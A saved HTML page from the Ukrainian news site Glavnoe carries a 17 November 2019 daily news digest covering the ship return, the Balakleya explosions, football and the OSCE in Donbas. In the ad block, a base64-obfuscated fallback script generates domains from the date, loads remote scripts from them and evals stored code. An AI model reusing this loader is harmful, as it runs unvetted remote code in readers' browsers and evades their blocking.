<!DOCTYPE HTML>
<html>
<head>
<title>О главном на Главном за 17 ноября 2019 - Новости Украины. Главное&trade;</title>
<link rel="stylesheet" href="/assets/css/style.css?v=1.6" type="text/css">
<link rel="stylesheet" href="/assets/css/font-awesome.css" type="text/css">
<link rel="stylesheet" href="/assets/css/cookiealert.css" type="text/css">
<link rel="stylesheet" href="/assets/js/jquery/css/glavnoe-theme/jquery-ui-1.10.4.custom.css">
<script src="/assets/js/jquery/js/jquery-1.10.2.js"></script>
<script src="/assets/js/jquery/js/jquery-ui-1.10.4.custom.js"></script>
<script src="/assets/js/jquery/js/jquery.ui.datepicker-ru.js"></script>
<script src="/assets/js/jquery/js/jquery.ui.datepicker-ru.js"></script>
<script type="text/javascript" src="/assets/js/global.js?v=1.1"></script>
<script charset="UTF-8" src="//cdn.sendpulse.com/js/push/c0700d43c9fdf80d92634fd97be4eb7c_1.js" async></script>
<script charset="UTF-8" src="//cdn.sendpulse.com/js/push/85014e1596cb45109e39067e39e7d026_0.js" async></script>

<script type="text/javascript" src="/assets/js/fancybox/jquery.fancybox.js?v=2.1.5"></script>
<link rel="stylesheet" type="text/css" href="/assets/js/fancybox/jquery.fancybox.css?v=2.1.5" media="screen" />
<link rel="shortcut icon" href="//glavnoe.ua/favicon.ico" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="//glavnoe.ua/rss/newsall.xml" />
<link rel="amphtml" href="https://m.glavnoe.ua/amp/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019">
<link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.glavnoe.ua/news/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019" />

<script type='text/javascript' src='//glavnoe.ua/scripts/jwplayer/jwplayer.js'></script>
<meta name="description" content="Захваченные Россией украинские корабли будут переданы Киеву в соответствии с достигнутыми российско-украинскими договоренностями 18 ноября.

***

Число жертв взрывов на арсенале в Балаклее выросло до трех человек. Военнослужащий, пострадавший в резуль...">
<meta name="keywords" content="">
<meta property="og:image" content="https://glavnoe.ua/media/images/news/03/57/00/92/45/357009245_default.jpg?1574049300" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="797" />
<meta property="og:title" content="О главном на Главном за 17 ноября 2019" />
<meta property="og:url" content="https://glavnoe.ua/news/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019" />
<meta property="og:site_name" content="Главное&trade;" />
<meta property="og:description" content="Захваченные Россией украинские корабли будут переданы Киеву в соответствии с достигнутыми российско-украинскими договоренностями 18 ноября.

***

Число жертв взрывов на арсенале в Балаклее выросло до трех человек. Военнослужащий, пострадавший в резуль..." />
<meta property="og:type" content="website" />
<meta property="fb:app_id" content="652701561441878" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@glavnoe_ua" />
<meta name="twitter:title" content="О главном на Главном за 17 ноября 2019" />
<meta name="twitter:description" content="Захваченные Россией украинские корабли будут переданы Киеву в соответствии с достигнутыми российско-украинскими договоренностями 18 ноября.

***

Число жертв взрывов на арсенале в Балаклее выросло до трех человек. Военнослужащий, пострадавший в резуль..." />
<meta name="twitter:image" content="https://glavnoe.ua/media/images/news/03/57/00/92/45/357009245_default.jpg?1574049300" />
<meta name="verify-admitad" content="7f55966ec4" />
<meta name="google-site-verification" content="QFY99w6W6Ul67aSEyFRe1vir-xQmVvw4-FGJ-cALmxU" />
<meta name="yandex-verification" content="fa8eaa5e0ef8d266" />
<meta charset="windows-1251">


<script async='async' src='https://www.googletagservices.com/tag/js/gpt.js'></script>
<script>
  var googletag = googletag || {};
  googletag.cmd = googletag.cmd || [];
</script>
<script>
  googletag.cmd.push(function() {
    googletag.defineSlot('/1438637/top_page', [970, 90], 'div-gpt-ad-1522913517412-0').addService(googletag.pubads());
    googletag.defineSlot('/1438637/right_top', [[240, 350], [240, 400]], 'div-gpt-ad-1541154793855-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.pubads().collapseEmptyDivs();
    googletag.enableServices();
  });
</script>


</head>
<body class='innerpage'>
<script async src="https://cdn.onthe.io/io.js?KhdHzcAFfFId"></script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-4669769-3', 'auto');
  ga('send', 'pageview');

</script>
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = 'https://connect.facebook.net/ru_RU/sdk.js#xfbml=1&version=v3.2&appId=652701561441878&autoLogAppEvents=1';
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>


<script>
    $(function() {
        $( ".datepicker" ).datepicker({
            inline: true,
            dateFormat: 'dd.mm.yy',
            onSelect: function(dateText, inst) {
            }
        });
            });
	
    $(function() {
		$(".fb-comments-button").click(function() {
    		$('html, body').animate({
	        	scrollTop: $("#yottos").offset().top
		    }, 1000);
		});
    });
	
</script>
<a id="is_edit" href="/?action=edit&id=357009245#formplace" style="position:fixed; top:0; left:0; display:none; padding: 10px 15px; background:#01BB00; color:#fff; text-decoration:none; text-transform:uppercase; font-size:14px; font-family:PT Sans Narrow,Arial; opacity:0.7;" target="_blank">Редактировать</a>

<div class="cookiealert" role="alert">
Мы используем файлы cookies для наилучшего представления нашего сайта. Если Вы продолжите использовать сайт, это будет означать, что Вы не возражаете против этого. <a href="https://cookiesandyou.com/" target="_blank">Подробнее</a>
<button type="button" class="acceptcookies" aria-label="Закрыть"> Продолжить </button>
</div>

<div class="full-width-wrapper" id="top-ads-block">
<div class="content-block" id="header">
<div id="ads-block-1" style="text-align:center;">




</div>
</div>
</div>
<div class="full-width-wrapper" id="main-block">
<div class="content-block">
<div id="main">

<header id="main-nav-block">
<div id="main-logo"><a href="/"><img src="/assets/images/logo-large.jpg"></a></div>
<nav id="main-nav">
<a href="/adv/" class="adv last"><span class="icon"></span>Реклама</a><a href="/calendar/" class="archive"><span class="icon"></span>Архив</a><a href="/columnist/" class="columns"><span class="icon"></span>Мнения</a><a href="/allarticles/" class="articles"><span class="icon"></span>Статьи</a><a href="/news/" class="news selected"><span class="icon"></span>Новости</a>






</nav>
<div id="top-search-tools-block">
<div>
<div id="tools-section">

<noindex>
<a target="_blank" href="https://t.me/glavnoeUA" class="telegram" rel="nofollow" title="Telegram"><span></span></a>

<a target="_blank" href="https://play.google.com/store/apps/details?id=com.inaspect.glavnoe.ua" class="android" rel="nofollow" title="Android приложение"><span></span></a>
<a target="_blank" href="https://glavnoe.ua/rss/newsall.xml" class="rss" rel="nofollow" title="RSS лента"><span></span></a>
<a target="_blank" href="https://www.facebook.com/glavnoe.ua/" class="facebook" rel="nofollow" title="Facebook"><span></span></a>
<a target="_blank" href="https://www.twitter.com/glavnoe_ua" class="twitter" rel="nofollow" title="Twitter"><span></span></a>


<a target="_blank" href="https://www.youtube.com/user/glavnoeua" class="youtube last" rel="nofollow" title="Youtube"><span></span></a>
</noindex>
</div>
<div id="search-section">
<script>
                        (function () {
                            var cx = 'partner-pub-7444186690923849:debdi4nv3pc';
                            var gcse = document.createElement('script');
                            gcse.type = 'text/javascript';
                            gcse.async = true;
                            gcse.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') +
                                    '//www.google.com/cse/cse.js?cx=' + cx;
                            var s = document.getElementsByTagName('script')[0];
                            s.parentNode.insertBefore(gcse, s);
                        })();
                    </script>
<gcse:search></gcse:search>
</div>
</div>
</div>
</header>


<nav id="theme-nav-block">
<a href="/news/politics/"><span>политика</span></a><a href="/news/economics/"><span>экономика</span></a><a href="/news/society/"><span>общество</span></a><a href="/news/culture/"><span>культура</span></a><a href="/news/health/"><span>здоровье</span></a><a href="/news/science/"><span>техно</span></a><a href="/news/accidents/"><span>происшествия</span></a><a href="/news/sports/"><span>спорт</span></a><a href="/news/interest/"><span>интересно</span></a><div id='region'><a href="#"><span>регионы</span></a><div class='regions'><a href='/news/region/r1' title='Новости Киева'>Киев</a><a href='/news/region/r2' title='Новости Чернигова, Черкасс, Кропивницкого'>Киевский</a><a href='/news/region/r3' title='Новости Харькова, Сум, Полтавы'>Слобожанский</a><a href='/news/region/r4' title='Новости Донецка, Луганска'>Донецкий</a><a href='/news/region/r5' title='Новости Днепра, Запорожья, Кривого Рога'>Приднепровский</a><a href='/news/region/r6' title='Новости Одессы, Николаева, Херсона'>Причерноморский</a><a href='/news/region/r7' title='Новости Луцка, Ровно, Житомира'>Полесский</a><a href='/news/region/r8' title='Новости Тернополя, Хмельницкого, Винницы'>Подольский</a><a href='/news/region/r9' title='Новости Львова, Ивано-Франковска, Черновцов, Ужгорода'>Карпатский</a><a href='/news/region/r11' title='Новости Крыма'>Крым</a></div></div><a href="/kharkov/"><span>Харьков</span></a>
</nav>

<div class="whole-wide-narrow">
<div class="left-column">
<div id="under-menu-ads" style="text-align:center;">
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:inline-block;width:970px;height:90px" data-ad-client="ca-pub-7444186690923849" data-ad-slot="5790830865"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>



</div>
<div class="two-one-columns first-is-wide">

<div class="double padded">
<div class="headed-block">
<div class="red header"></div>
<article class="body one-article">
<div class="newsitem">
<h1 class="newstitle">О главном на Главном за 17 ноября 2019</h1>
<div class="newstools">
<div class="newsdate">17 ноября 2019</div>
<div class="newstime">21:03</div>
<div class="newsstat"><span class="views">297</span></div>
<div class="newssocial with-print">
 <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5747035dae0c7fd6"></script>
 <div class="addthis_inline_share_toolbox_yf05"></div>

<div class="newsprint">
<a target="_blank" href="/news/n357009245/print"><span title="Печать" class="print-button"></span></a>
</div>
</div>
<div class="newssocial-label">Поделиться:</div>
</div>
<div class="info">
<div align='center' id='ban_before_text'></div>
<div class="newstext"><p>Захваченные Россией <a href="https://glavnoe.ua/news/n357009216-v-rf-podtverdili-peredachu-ukraine-zahvachennyh-korablej" target="_blank">украинские корабли будут переданы</a> Киеву в соответствии с достигнутыми российско-украинскими договоренностями 18 ноября.</p><p style="text-align: center;">***</p><p>Число жертв <a href="https://glavnoe.ua/news/n357009210-chislo-zhertv-vzryvov-na-arsenale-v-balaklee-vyroslo-do-treh-chelovek" target="_blank">взрывов на арсенале в Балаклее</a> выросло до трех человек. Военнослужащий, пострадавший в результате ЧП умер в Харьковской городской клинической больнице скорой и неотложной медицинской помощи.</p><p style="text-align: center;">***</p><p><a href="https://glavnoe.ua/news/n357009222-sbornaja-ukrainy-zavershila-otborochnyj-cikl-evro-2020" target="_blank">Сборная Украины</a> провела заключительный матч отборочного цикла Евро-2020. Впервые в истории наша футбольная команда завершила календарный год без поражений.</p><p style="text-align: center;">***</p><p>Специальная мониторинговая миссия Организации по безопасности и сотрудничеству в Европе констатировала <a href="https://glavnoe.ua/news/n357009140-obse-zafiksirovala-umenshenie-kolichestva-vzryvov-na-donbasse" target="_blank">уменьшение количества взрывов на Донбассе</a>.</p><p>Только в Донецкой области было зафиксировано приблизительно 175 взрывов, что более чем вдвое меньше по сравнению с предыдущим отчетным периодом (390).</p></div></div> </div>
<small><p align="center"><i>Если вы заметили орфографическую ошибку в тексте, выделите ее мышью и нажмите Ctrl+Enter</i></p></small>
<noindex>
<div class="facebook-tools">
<div class="fb-like" data-href="https://glavnoe.ua/news/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div>

</div>
</noindex>
</article>
<div class="after-news-ads">

<div id="yandex_rtb_R-A-107979-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-107979-1",
                renderTo: "yandex_rtb_R-A-107979-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-7444186690923849" data-ad-slot="7747265681" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br>
</div>
<div id="yottos">
<div id="MIXADV_1251" class="MIXADVERT_NET"></div>
<script> 
          var node1251 = document.getElementById("MIXADV_1251");
          if( node1251 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=1251&r="+Math.random();
               node1251.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDEyNTEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMTI1MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTEyNTEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTEyNTEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjEyNTEiKSkgfSwgNTAwMCk7ICA7fTsg") );
              }
          }
          </script>





</div>
<br>

</div>
</div>


<div class="single">
<div class="headed-block">
<div class="dark-gray header"><a href="/news/">главные новости</a></div>
<div class="body authors-tape padded lightgray">
<div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009223-oos-boeviki-shest-raz-narushili-rezhim-prekraschenija-ognja" title="ООС: боевики шесть раз нарушили режим прекращения огня"></a><div class="image"><img src="/media/images/news/03/57/00/92/23/357009223_48x48.jpg" alt="ООС: боевики шесть раз нарушили режим прекращения огня"></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009223-oos-boeviki-shest-raz-narushili-rezhim-prekraschenija-ognja">ООС: боевики шесть раз нарушили режим прекращения огня</a><span class="views">413</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009222-sbornaja-ukrainy-zavershila-otborochnyj-cikl-evro-2020" title="Сборная Украины завершила отборочный цикл Евро-2020"></a><div class="image"><img src="/media/images/news/03/57/00/92/22/357009222_48x48.jpg" alt="Сборная Украины завершила отборочный цикл Евро-2020"></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009222-sbornaja-ukrainy-zavershila-otborochnyj-cikl-evro-2020">Сборная Украины завершила отборочный цикл Евро-2020</a><span class="views">894</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009216-v-rf-podtverdili-peredachu-ukraine-zahvachennyh-korablej" title="В РФ подтвердили передачу Украине захваченных кораблей"></a><div class="image"><img src="/media/images/news/03/57/00/92/16/357009216_48x48.jpg" alt="В РФ подтвердили передачу Украине захваченных кораблей"></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009216-v-rf-podtverdili-peredachu-ukraine-zahvachennyh-korablej">В РФ подтвердили передачу Украине захваченных кораблей</a><span class="views">715</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009210-chislo-zhertv-vzryvov-na-arsenale-v-balaklee-vyroslo-do-treh-chelovek" title="Число жертв взрывов на арсенале в Балаклее выросло до трех человек"></a><div class="image"><img src="/media/images/news/03/57/00/92/10/357009210_48x48.jpg" alt="Число жертв взрывов на арсенале в Балаклее выросло до трех человек"></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009210-chislo-zhertv-vzryvov-na-arsenale-v-balaklee-vyroslo-do-treh-chelovek">Число жертв взрывов на арсенале в Балаклее выросло до трех человек</a><span class="views">644</span></div></div></div>
</div>

<div class="headed-block padded">
<div class="body">

<div id="yandex_rtb_R-A-107979-2"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-A-107979-2",
                renderTo: "yandex_rtb_R-A-107979-2",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>

<style>
#MIXADV_1553 {
    z-index: 1 !important;
}
</style>
</div>
</div>
<div class="dark-gray header"><a href="/columnist/">мнения</a></div>
<div class="body authors-tape padded">
<div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12736-alternativna-energetika-potjag-jakij-mozhe-piti-bez-ukraini" title="Альтернативна енергетика &ndash; потяг, який може піти без України"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1496990658.jpg" alt="Альтернативна енергетика &ndash; потяг, який може піти без України"></div><div class="info"><div class="newsauthor">Игорь КОТВИЦКИЙ</div><div class=newstitle><a href="//glavnoe.ua/articles/a12736-alternativna-energetika-potjag-jakij-mozhe-piti-bez-ukraini">Альтернативна енергетика &ndash; потяг, який може піти без України</a><span class="views">1751</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12727-a-ukraina-ostanetsja" title="А Украина останется"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1480358405.jpg" alt="А Украина останется"></div><div class="info"><div class="newsauthor">Виталий ПОРТНИКОВ</div><div class=newstitle><a href="//glavnoe.ua/articles/a12727-a-ukraina-ostanetsja">А Украина останется</a><span class="views">4078</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12725-schasliva-i-bezturbotna-nacija" title="Щаслива і безтурботна нація&hellip;"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1052922_359462507515809_870229073_o.jpg" alt="Щаслива і безтурботна нація&hellip;"></div><div class="info"><div class="newsauthor">Іван ВАРЧЕНКО</div><div class=newstitle><a href="//glavnoe.ua/articles/a12725-schasliva-i-bezturbotna-nacija">Щаслива і безтурботна нація&hellip;</a><span class="views">2499</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12724-chomu-borotba-z-korupcieju-v-ukraini-peretvorjuetsja-na-politichne-shou" title="Чому боротьба з корупцією в Україні перетворюється на політичне шоу"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1496990658.jpg" alt="Чому боротьба з корупцією в Україні перетворюється на політичне шоу"></div><div class="info"><div class="newsauthor">Игорь КОТВИЦКИЙ</div><div class=newstitle><a href="//glavnoe.ua/articles/a12724-chomu-borotba-z-korupcieju-v-ukraini-peretvorjuetsja-na-politichne-shou">Чому боротьба з корупцією в Україні перетворюється на політичне шоу</a><span class="views">2450</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12723-ukraina-pokazhe-vsomu-svitu-scho-ne-kidae-svoih" title="Україна покаже всьому світу, що не кидає своїх"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1485089844.jpg" alt="Україна покаже всьому світу, що не кидає своїх"></div><div class="info"><div class="newsauthor">Антон ГЕРАЩЕНКО</div><div class=newstitle><a href="//glavnoe.ua/articles/a12723-ukraina-pokazhe-vsomu-svitu-scho-ne-kidae-svoih">Україна покаже всьому світу, що не кидає своїх</a><span class="views">2508</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12722-poligraf-nevrastenik-vsegda-vinoven" title="Полиграф: неврастеник &mdash; всегда виновен..."></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/1562923908.jpg" alt="Полиграф: неврастеник &mdash; всегда виновен..."></div><div class="info"><div class="newsauthor">Александр КИРШ</div><div class=newstitle><a href="//glavnoe.ua/articles/a12722-poligraf-nevrastenik-vsegda-vinoven">Полиграф: неврастеник &mdash; всегда виновен...</a><span class="views">3208</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/articles/a12721-prostimi-slovami-cifrove-posvidchennja-vodija" title="Простими словами &ndash; цифрове посвідчення водія"></a><div class="image"><img src="//glavnoe.ua/UserFiles/Image/authors/aba_avatar2.jpg" alt="Простими словами &ndash; цифрове посвідчення водія"></div><div class="info"><div class="newsauthor">Арсен АВАКОВ</div><div class=newstitle><a href="//glavnoe.ua/articles/a12721-prostimi-slovami-cifrove-posvidchennja-vodija">Простими словами &ndash; цифрове посвідчення водія</a><span class="views">2927</span></div></div></div>
</div>
<div class="headed-block padded">
<div class="body">




</div>
</div>
</div>
</div>

</div>
</div>

<div class="right-column">
<div class='headed-block'>
<div class='red header'>
<a href='/authors/a1639/p1/'>Герои АТО</a>
</div>
<a class='banner_hero' style='background-image: url(/UserFiles/Image/articles/170620171129_do6.jpg); background-size: cover; background-position: center;' href='/articles/a11551'><div class='title_hero'>Гвардієць, що загинув під Слов&#039;янськом</div></a>
</div>
<br>
<div class="headed-block padded">

<div class="body">
<div class="ad-240x400" id="ads-block-20">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>

<ins class="adsbygoogle" style="display:inline-block;width:240px;height:400px" data-ad-client="ca-pub-7444186690923849" data-ad-slot="7830148069"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>



</div>
</div>
</div>

<div class="single">
<div class="headed-block">
<div class="gray header"><a href="/news/">последние новости</a></div>
<div class="body news-tape padded">
<div class="itemsgroup">17 ноября 2019</div><div class="newsitem important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019"></a><div class="newstime">21:03<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009245-o-glavnom-na-glavnom-za-17-nojabrja-2019">О главном на Главном за 17 ноября 2019</a><span class="views">296</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009244-v-rf-zajavili-chto-konkretnoj-daty-vstrechi-v-normandskom-formate-net"></a><div class="newstime">20:52</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009244-v-rf-zajavili-chto-konkretnoj-daty-vstrechi-v-normandskom-formate-net">В РФ заявили, что конкретной даты встречи в Нормандском формате нет</a><span class="views">443</span></div></div></div><div class="newsitem with-image"><a class="link-wrapper" href="//glavnoe.ua/news/n357009243-s-nachala-goda-v-kieve-zamenili-bolee-10-tys-svetilnikov-na-70-ulicah-na-led-modeli"></a><div class="newstime">20:36<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class="image"><img src="/media/images/news/03/57/00/92/43/357009243_43x43.jpg" alt="С начала года в Киеве заменили более 10 тыс. светильников на 70 улицах на LED-модели"></div><div class=newstitle><a href="//glavnoe.ua/news/n357009243-s-nachala-goda-v-kieve-zamenili-bolee-10-tys-svetilnikov-na-70-ulicah-na-led-modeli">С начала года в Киеве заменили более 10 тыс. светильников на 70 улицах на LED-модели</a><span class="views">427</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009242-minekonomiki-uvolilo-pochti-polusotnju-rukovoditelej-gospredprijatij"></a><div class="newstime">20:23<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009242-minekonomiki-uvolilo-pochti-polusotnju-rukovoditelej-gospredprijatij">Минэкономики уволило почти полсотни руководителей госпредприятий</a><span class="views">478</span></div></div></div><div class="newsitem important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009238-pirotehniki-prodolzhajut-obsledovanie-territorij-na-linii-razgranichenija"></a><div class="newstime">19:54<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009238-pirotehniki-prodolzhajut-obsledovanie-territorij-na-linii-razgranichenija">Пиротехники продолжают обследование территорий на линии разграничения</a><span class="views">414</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009235-v-kievskoj-gostinice-ukraina-u-amerikanca-ukrali-35-tysjach-evro"></a><div class="newstime">19:37</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009235-v-kievskoj-gostinice-ukraina-u-amerikanca-ukrali-35-tysjach-evro">В киевской гостинице &quot;Украина&quot; у американца украли 35 тысяч евро</a><span class="views">613</span></div></div></div><div class="newsitem important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009233-v-zone-oos-ot-puli-snajpera-pogib-voennyj-14-j-ombr-artem-sokolov"></a><div class="newstime">19:29<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009233-v-zone-oos-ot-puli-snajpera-pogib-voennyj-14-j-ombr-artem-sokolov">В зоне ООС от пули снайпера погиб военный 14-й ОМБр Артем Соколов</a><span class="views">571</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009227-nazvany-top-5-aviakompanij-ispolzujuschih-vozdushnoe-prostranstvo-ukrainy"></a><div class="newstime">19:09</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009227-nazvany-top-5-aviakompanij-ispolzujuschih-vozdushnoe-prostranstvo-ukrainy">Названы топ-5 авиакомпаний, использующих воздушное пространство Украины</a><span class="views">610</span></div></div></div><div class="newsitem"><a class="link-wrapper" href="//glavnoe.ua/news/n357009225-rpc-mozhet-vooruzhitsja-fabrikoj-trollej"></a><div class="newstime">19:02</div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009225-rpc-mozhet-vooruzhitsja-fabrikoj-trollej">РПЦ может вооружиться &quot;фабрикой троллей&quot;</a><span class="views">541</span></div></div></div><div class="newsitem with-image"><a class="link-wrapper" href="//glavnoe.ua/news/n357009224-reaktivnyj-superkar-dostig-skorosti-bolee-tysjachi-kmch"></a><div class="newstime">18:41</div><div class="info"><div class="image"><img src="/media/images/news/03/57/00/92/24/357009224_43x43.jpg" alt="Реактивный суперкар достиг скорости более тысячи км/ч"></div><div class=newstitle><a href="//glavnoe.ua/news/n357009224-reaktivnyj-superkar-dostig-skorosti-bolee-tysjachi-kmch">Реактивный суперкар достиг скорости более тысячи км/ч</a><span class="views">597</span></div></div></div><div class="newsitem important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009223-oos-boeviki-shest-raz-narushili-rezhim-prekraschenija-ognja"></a><div class="newstime">18:17<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009223-oos-boeviki-shest-raz-narushili-rezhim-prekraschenija-ognja">ООС: боевики шесть раз нарушили режим прекращения огня</a><span class="views">413</span></div></div></div><div class="newsitem important"><a class="link-wrapper" href="//glavnoe.ua/news/n357009222-sbornaja-ukrainy-zavershila-otborochnyj-cikl-evro-2020"></a><div class="newstime">18:02<div class="newsmarks"><span class="own"></span></div></div><div class="info"><div class=newstitle><a href="//glavnoe.ua/news/n357009222-sbornaja-ukrainy-zavershila-otborochnyj-cikl-evro-2020">Сборная Украины завершила отборочный цикл Евро-2020</a><span class="views">894</span></div></div></div><div class="newsitem"><a class="link-wrapper" 